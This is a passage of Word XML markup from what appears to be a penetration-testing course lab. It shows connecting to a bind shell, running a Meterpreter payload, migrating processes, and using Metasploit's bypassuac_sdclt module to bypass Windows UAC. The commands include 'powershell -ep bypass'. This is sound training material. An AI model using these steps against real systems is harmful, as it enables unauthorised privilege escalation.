          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OneDrive.exe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> process that is running at (presumably) medium integrity. For this section, let's repeat the steps from the previous section and then bypass UAC with a Metasploit post-exploitation module to obtain a session in the context of a high integrity level process.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000553">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As before, we connect to the bind shell on port 4444 on ITWK01, download and execute </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">met.exe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and enter </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">getsystem</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to elevate our privileges. Then, we use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ps</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to identify the process ID of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OneDrive.exe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">migrate</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000554">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4704786" cy="3309938"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="383" name="image369.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image369.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId108"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4704786"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spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 66 shows that we are now running in the context of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">offsec</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> again. While this is an administrative account, UAC prevents us from performing administrative operations as we learned in previous Modules. Before we attempt to bypass UAC, let's confirm that the current process has the integrity level </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Medium</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000557">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To display the integrity level of a process, we can use tools such as</w:t>
      </w:r>
      <w:hyperlink r:id="rId109">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId110">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Process Explorer</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> or third-party PowerShell modules such as</w:t>
      </w:r>
      <w:hyperlink r:id="rId111">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId112">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">NtObjectManager</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Let's assume the latter is already installed on the system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000558">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once we import the module with</w:t>
      </w:r>
      <w:hyperlink r:id="rId113">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId114">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Import-Module</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we can use</w:t>
      </w:r>
      <w:hyperlink r:id="rId115">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId116">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Get-NtTokenIntegrityLevel</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to display the integrity level of the current process by retrieving and reviewing the assigned access token.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000559">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4216567" cy="3081338"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="515" name="image498.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image498.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId117"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4216567"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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="132"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000055B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="132"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">powershell -ep bypass</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000055C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="132"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Import-Module NtObjectManager</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000055D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="132"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Get-NtTokenIntegrityLevel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000055E">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 67 shows that we are currently performing operations in the context of integrity level </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Medium</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000055F">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Next, let's background the currently active channel and session to search for and leverage UAC post-exploitation modules.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000560">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4681538" cy="1538005"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="537" name="image541.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image541.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId118"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4681538" cy="1538005"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000561">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now let's </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">search</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for UAC bypass modules.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000562">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5323676" cy="3967163"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="423" name="image408.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image408.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId119"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5323676" cy="3967163"/>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spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The search yields quite a few results. One very effective UAC bypass on modern Windows systems is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">exploit/windows/local/bypassuac_sdclt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> which targets the Microsoft binary </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sdclt.exe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. This binary can be abused to</w:t>
      </w:r>
      <w:hyperlink r:id="rId120">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId121">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">bypass UAC by spawning a process</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with integrity level </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">High</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000564">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To use the module, we'll activate it and set the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SESSION</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LHOST</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> options as shown in the following listing. Setting the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SESSION</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for post-exploitation modules allows us to directly execute the exploit on the active session. Then, we can enter </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">run</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to launch the module.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000565">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="7632700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="379" name="image381.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image381.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId122"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="7632700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000566">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="921"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">use exploit/windows/local/bypassuac_sdclt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000567">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 70 shows that our UAC bypass post-exploitation module created a new Meterpreter session for us.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000568">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's check the integrity level of the process as we did before.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000569">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5246201" cy="3867392"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="578" name="image558.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image558.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId123"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5246201" cy="3867392"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
